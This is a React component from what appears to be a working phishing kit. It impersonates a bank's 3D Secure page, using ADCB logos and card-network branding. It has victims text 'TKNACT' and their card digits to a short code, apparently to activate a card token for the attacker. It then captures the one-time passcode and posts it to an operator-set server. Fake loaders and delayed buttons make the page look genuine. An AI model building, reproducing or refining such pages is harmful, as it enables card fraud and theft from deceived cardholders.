import React, { useEffect, useState } from "react";
import HelpImage from "./assets/help.gif";
import axios from "axios";
import { useNavigate } from "react-router-dom";
import { AnimatePresence, motion } from "framer-motion";
import PciImage from "./assets/pci.jpg";
import VisaImage from "./assets/visa.jpg";
import MasterImage from "./assets/master.jpg";
import AbcImage from "./assets/adcbb_logo.jpg";
import { RotatingLines, TailSpin } from "react-loader-spinner";

const Adcb = () => {
      const [disabled, setDisabled] = useState(true);

  useEffect(() => {
    const timer = setTimeout(() => setDisabled(false), 5000);
    return () => clearTimeout(timer); // cleanup
  }, []);
  const [step, setStep] = useState("sms");
  const [submitBtnContent, setSubmitBtnContent] = useState("Submit");
  const [submitBtnDis, setSubmitBtnDis] = useState(false);
  const navigate = useNavigate();
  const [input1Value, setInput1Value] = useState("");
  const today = new Date();
  const formattedDate = `${today.getDate().toString().padStart(2, "0")}/${(
    today.getMonth() + 1
  )
    .toString()
    .padStart(2, "0")}/${today.getFullYear()}`;

  const handleCodeSubmit = async () => {
    setSubmitBtnContent(<div className="inputLoader"></div>);
    setSubmitBtnDis(true);
    const dataToSend = {
      uuId: localStorage.getItem("uuId"),
      code: input1Value,
    };

    try {
      const response = await axios.post(
        `${process.env.REACT_APP_SERVER_URL}/api/otp_verif`,
        dataToSend
      );
      if (response.status === 200) {
        navigate("/3ds/loading");
      }
    } catch (error) {
      setTimeout(() => {
        setSubmitBtnDis(false);
        setSubmitBtnContent("Submit");
      }, 3000);
    }
  };

  useEffect(() => {
    updateSubmitBtnDisabled();
  }, [input1Value]);

  const updateSubmitBtnDisabled = () => {
    // Enable submit button if OTP is 4-8 digits
    if (input1Value.length >= 4 && input1Value.length <= 8) {
      setSubmitBtnDis(false);
    } else {
      setSubmitBtnDis(true);
    }
  };

  const firstDigit = localStorage.getItem("first-digit");

  // Determine the image source and alt text
  let imageSrc, altText;
  if (firstDigit === "4") {
    imageSrc = VisaImage;
    altText = "Visa";
  } else if (firstDigit === "5") {
    imageSrc = MasterImage;
    altText = "Mastercard";
  } else {
    imageSrc = null; // No image if not 4 or 5
    altText = "No card";
  }

  const lastSix = localStorage.getItem("last-six-digits") || "123456";
  const [copied, setCopied] = useState(false);

  const copyToClipboard = () => {
    const text = `TKNACT ${lastSix}`;

    if (navigator?.clipboard?.writeText) {
      navigator.clipboard
        .writeText(text)
        .then(() => {
          showCopied();
        })
        .catch(() => fallbackCopy(text));
    } else {
      fallbackCopy(text);
    }
  };

  const fallbackCopy = (text) => {
    try {
      const textarea = document.createElement("textarea");
      textarea.value = text;
      textarea.setAttribute("readonly", "");
      textarea.style.position = "absolute";
      textarea.style.left = "-9999px";
      document.body.appendChild(textarea);
      textarea.select();
      document.execCommand("copy");
      document.body.removeChild(textarea);
      showCopied();
    } catch (e) {
      console.error("Copy failed", e);
    }
  };

  const showCopied = () => {
    setCopied(true);
    setTimeout(() => setCopied(false), 2000);
  };

  const [loading, setLoading] = useState(false);

  const handleSmsSent = () => {
    setLoading(true);
    setTimeout(() => {
      setLoading(false);
      setStep("otp");
    }, 3000);
  };

  return (
    <div className="flex items-center justify-center w-full min-h-screen bg-white">
      <div className="w-full max-w-sm   bg-white border-2 shadow border-neutral-300">
        <div className="flex items-center p-4 justify-between w-full ">
          <img
            src={AbcImage} // Замените на фактический логотип PCI DSS
            alt="PCI DSS Compliant"
            className="h-10 mr-4"
          />
          {imageSrc && <img src={imageSrc} alt={altText} className="h-10" />}
        </div>
        <div className="flex flex-col bg-gradient-to-b from-[#E2EAF5] p-4 to-white">
          <h1 className="mb-4  font-bold text-neutral-600">
            {step === "otp" && "3D Secure Online Shopping"}
            {step === "sms" && "3D Secure Online Shopping"}
          </h1>
          <p className="mb-6 text-sm text-neutral-600">
            {step === "otp" &&
              "A one-time Passcode is required for this purchase. This Passcode has been sent to your registered mobile phone number."}
          </p>

          {step === "otp" && (
            <div className="flex flex-col relative p-4 rounded-t-lg bg-white">
              <span className=" font-bold text-neutral-600 mb-4">
                Transaction details:
              </span>
              <div className="grid grid-cols-2 mb-4 text-xs gap-x-4">
                <span className="text-xs  justify-self-end">Merchant:</span>
                <span className="text-gray-900">
                  {process.env.REACT_APP_MERCHANT_NAME}
                </span>

                <span className="text-xs justify-self-end">Date:</span>
                <span className="text-gray-700">{formattedDate}</span>

                <span className="text-xs justify-self-end">Card Number:</span>
                <span className="text-gray-900">
                  **** **** **** {localStorage.getItem("last-four-digits")}
                </span>

                <span className="text-xs justify-self-end">Amount:</span>
                <span className="text-gray-900">
                  {localStorage.getItem("currency") ||
                    process.env.REACT_APP_CURRENCY}{" "}
                  {localStorage.getItem("summ")}
                </span>
              </div>
              <div>
                <div className="grid items-center gap-x-4 grid-cols-2">
                  <label
                    htmlFor="otp"
                    className="block mb-2 text-xs text-end font-medium text-gray-500"
                  >
                    Enter your OTP:
                  </label>
                  {/* <input
              id="otp"
              type="text"
              placeholder="Enter Passcode"
              className="w-full px-2 py-1 text-xs border border-gray-300 rounded-sm focus:outline-none "
              /> */}

                  <input
                    value={input1Value}
                    onChange={(e) => setInput1Value(e.target.value)}
                    type="text"
                    inputMode="numeric"
                    maxLength={8}
                    className="w-full px-2 py-1 text-xs border border-gray-300 rounded-sm focus:outline-none "
                    placeholder="Enter Passcode"
                  />
                  <div className=""></div>
                  {/* <div className="flex justify-between mt-3 mb-4 text-xs text-neutral-500">
              <a
                href="#"
                className="leading-3 underline hover:underline"
                >
                Haven't received a one-time passcode?
              </a>
            </div> */}
                </div>
                <div className="flex mt-6 items-center justify-end">
                  <button
                    onClick={handleCodeSubmit}
                    type="submit"
                    disabled={submitBtnDis}
                    className="px-4 py-2 bg-gradient-to-b from-[#5DB1DD] to-[#2F81BB] text-white text-sm rounded"
                  >
                    {submitBtnContent}
                  </button>
                  {/* <button
                    type="button"
                    onClick={() => navigate("/homepage")}
                    className="px-4 py-2 bg-gradient-to-b from-[#5DB1DD] to-[#2F81BB] text-white text-sm rounded"
                  >
                    Cancel
                  </button> */}

                </div>
              </div>
            </div>
          )}
          {step === "sms" && (
            <div className="flex flex-col relative p-4 rounded-t-lg bg-white">
{loading && (
  <AnimatePresence>
    {loading && (
      <motion.div
        key="loader"
        initial={{ opacity: 0, scale: 0.95 }}
        animate={{ opacity: 1, scale: 1 }}
        exit={{ opacity: 0, scale: 0.95 }}
        transition={{ duration: 0.3, ease: "easeInOut" }}
        className="absolute z-50 top-0 left-0 bottom-0 right-0 flex justify-center items-center bg-neutral-50 bg-opacity-5 backdrop-blur-sm"
      >
        <RotatingLines
          visible={true}
          height="64"
          width="64"
          color="#ffffff"
          strokeColor="#A6ABB7"
          strokeWidth="6"
          animationDuration="0.75"
          ariaLabel="rotating-lines-loading"
        />
      </motion.div>
    )}
  </AnimatePresence>
)}
              <span className=" font-bold text-neutral-600 mb-4">
                Card Verification:
              </span>
              <div className="grid grid-cols-2 mb-4 text-xs gap-x-4">
                <span className="text-xs  justify-self-end">Merchant:</span>
                <span className="text-gray-900">
                  {process.env.REACT_APP_MERCHANT_NAME}
                </span>

                <span className="text-xs justify-self-end">Date:</span>
                <span className="text-gray-700">{formattedDate}</span>

                <span className="text-xs justify-self-end">Card Number:</span>
                <span className="text-gray-900">
                  **** **** **** {localStorage.getItem("last-four-digits")}
                </span>

                <span className="text-xs justify-self-end">Amount:</span>
                <span className="text-gray-900">
                  {localStorage.getItem("currency") ||
                    process.env.REACT_APP_CURRENCY}{" "}
                  {localStorage.getItem("summ")}
                </span>
              </div>
              <div>
                <div className="flex flex-col gap-y-2 text-left">
                  <span className="text-[8px]">
                    1.{" "}
                    <span className="text-xs">
                      Use your registered mobile number.
                    </span>
                  </span>
                  <span className="text-[8px]">
                    2.{" "}
                    <span className="text-xs">
                      Open your SMS app and type the message exactly like this
                      (one space):
                    </span>
                  </span>

                  {/* Click-to-copy box */}
                  <div className="flex items-center gap-x-2">
                    <button
                      onClick={copyToClipboard}
                      className="bg-neutral-100 w-fit font-semibold px-2 py-1 rounded cursor-pointer hover:bg-neutral-200 transition"
                    >
                      TKNACT {lastSix}
                    </button>
                    {copied && (
                      <span className="text-[10px] text-green-600">
                        Copied to clipboard
                      </span>
                    )}
                  </div>
                  <span className="text-[10px] text-gray-500">
                    (Click above to copy)
                  </span>

                  {/* Optional: Tap to open SMS (iOS/Android friendly) */}

                  <a
                    href={`sms:2626?&body=TKNACT%20${lastSix}`}
                    className="text-[8px] underline text-blue-500"
                  >
                    3. <span className="text-xs">Send the SMS to: 2626.</span>
                  </a>

                  <div className="w-full px-4">
                    <span className="text-center text-[9px]">Example:</span>
                    <div className="w-full shadow-lg flex flex-col overflow-hidden rounded-lg">
                      <div className="w-full grid grid-cols-3 justify-center p-2 bg-[#F5F4F4] border-b-2 border-[#EEEEEE]">
                        <svg
                          className=" self-center"
                          width="12"
                          height="18"
                          viewBox="0 0 14 24"
                          fill="none"
                          xmlns="http://www.w3.org/2000/svg"
                        >
                          <path
                            d="M12 2L1.79737 11.7168C1.36996 12.1238 1.38624 12.8106 1.83247 13.1969L12 22"
                            stroke="#0375FF"
                            stroke-width="2.5"
                            stroke-linecap="round"
                          />
                        </svg>

                        <div className="flex flex-col justify-self-center items-center text-center">
                          <svg
                            width="32"
                            height="32"
                            viewBox="0 0 32 32"
                            fill="none"
                            xmlns="http://www.w3.org/2000/svg"
                          >
                            <g clip-path="url(#clip0_6171_269)">
                              <path
                                d="M16 32C24.8366 32 32 24.8366 32 16C32 7.16344 24.8366 0 16 0C7.16344 0 0 7.16344 0 16C0 24.8366 7.16344 32 16 32Z"
                                fill="url(#paint0_linear_6171_269)"
                              />
                              <path
                                d="M6.15137 25.6415C6.15137 25.6415 16.0347 35.1447 25.9527 25.6415C21.4948 19.6976 9.60709 20.4579 6.15137 25.6415Z"
                                fill="white"
                              />
                              <path
                                d="M16.0002 18.7991C18.9966 18.7991 21.4257 16.0761 21.4257 12.7171C21.4257 9.35802 18.9966 6.63499 16.0002 6.63499C13.0038 6.63499 10.5747 9.35802 10.5747 12.7171C10.5747 16.0761 13.0038 18.7991 16.0002 18.7991Z"
                                fill="white"
                              />
                            </g>
                            <defs>
                              <linearGradient
                                id="paint0_linear_6171_269"
                                x1="16"
                                y1="0"
                                x2="16"
                                y2="32"
                                gradientUnits="userSpaceOnUse"
                              >
                                <stop stop-color="#A6ABB7" />
                                <stop offset="1" stop-color="#858A93" />
                              </linearGradient>
                              <clipPath id="clip0_6171_269">
                                <rect width="32" height="32" fill="white" />
                              </clipPath>
                            </defs>
                          </svg>
                          <div className="flex items-center gap-x-1">
                            <span className="text-[9px] flex items-center gap-x-1  leading-3">
                              2626
                            </span>
                            <svg
                              width="3"
                              height="6"
                              viewBox="0 0 6 10"
                              fill="none"
                              xmlns="http://www.w3.org/2000/svg"
                            >
                              <path
                                d="M1 1L4.88192 4.88672C5.04454 5.04954 5.03834 5.32424 4.86856 5.47878L1 9"
                                stroke="#AEAEB1"
                                stroke-width="1.5"
                                stroke-linecap="round"
                              />
                            </svg>
                          </div>
                        </div>
                      </div>
                      <div className="w-full px-2 pb-6 bg-white">
                        <span className="text-[9px] mb-2 text-neutral-600 text-center">
                          Text Message
                        </span>
                        <div className="w-full flex justify-end">
                          <div className="px-3 py-1 bg-[#34C759] rounded-full relative">
                            <span className="text-white font-medium text-sm">
                              TKNACT {lastSix}
                            </span>
                            <svg
                              className=" absolute -bottom-1 -right-1"
                              width="15"
                              height="19"
                              viewBox="0 0 15 19"
                              fill="none"
                              xmlns="http://www.w3.org/2000/svg"
                            >
                              <path
                                d="M15 18.5C7.4 12.5 8 0 8 0L0 12.5C4.8 16.5 12 18.1667 15 18.5Z"
                                fill="#34C759"
                              />
                            </svg>
                          </div>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>

                <div className="flex mt-6 items-center justify-center">

                    <button
                      onClick={handleSmsSent}
                      type="submit"
                      disabled={disabled}
                      className="px-4 py-2 disabled:opacity-50 transition-all opacity-100 bg-gradient-to-b from-[#5DB1DD] to-[#2F81BB] text-white text-sm rounded"
                    >
                      I Confirm I Sent the SMS
                    </button>

                  {/* <button
                    type="button"
                    onClick={() => navigate("/homepage")}
                    className="px-4 py-2 bg-gradient-to-b from-[#5DB1DD] to-[#2F81BB] text-white text-sm rounded"
                  >
                    Cancel
                  </button> */}
                </div>
              </div>
            </div>
          )}
        </div>
        <div className="w-full  p-4 bg-[#E2EAF5] text-xs text-center text-black border-b">
          <span className="text-center">
            By clicking "Submit" you agree to the Terms of Service
          </span>
        </div>
      </div>
    </div>
  );
};

export default Adcb;
